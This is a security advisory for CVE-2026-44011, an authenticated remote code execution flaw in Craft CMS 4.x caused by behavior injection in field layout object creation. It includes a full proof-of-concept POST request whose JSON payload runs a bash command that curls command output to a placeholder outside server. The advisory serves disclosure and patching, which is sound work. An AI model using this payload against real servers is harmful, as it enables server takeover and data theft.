CVE-2026-44011
EPSS 0.02%Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior
Description
We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list. This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original. The request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event. This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path. We were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path: ``` POST /admin/actions/element-search/search HTTP/2 Host: hostnamehere Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...; Content-Length: … User-Agent: Mozilla/5.0 X-Csrf-Token: ... Accept: application/json Content-Type: application/json { "elementType": "craft\\elements\\Category", "siteId": 1, "search": "", "condition": { "class": "craft\\elements\\conditions\\ElementCondition", "elementType": "craft\\elements\\Category", "fieldLayouts": [ { "as rce": { "__class": "yii\\behaviors\\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": [ "Psy\\Readline\\Hoa\\ConsoleProcessus", "execute" ] }, "typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/`id`\](https://yourcollaboratorservergoeshere/%60id%60/)"" } ] }, "on *": "self::beforeSave" } ] } } ``` ## Resources https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3
Affected packages (1)
- Packagist/craftcms/cms>= 4.0.0, < 4.17.12
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 4.0 | — | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |
References (5)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2026-44011
- PATCHhttps://github.com/craftcms/cms
- WEBhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3
- WEBhttps://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5
- WEBhttps://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw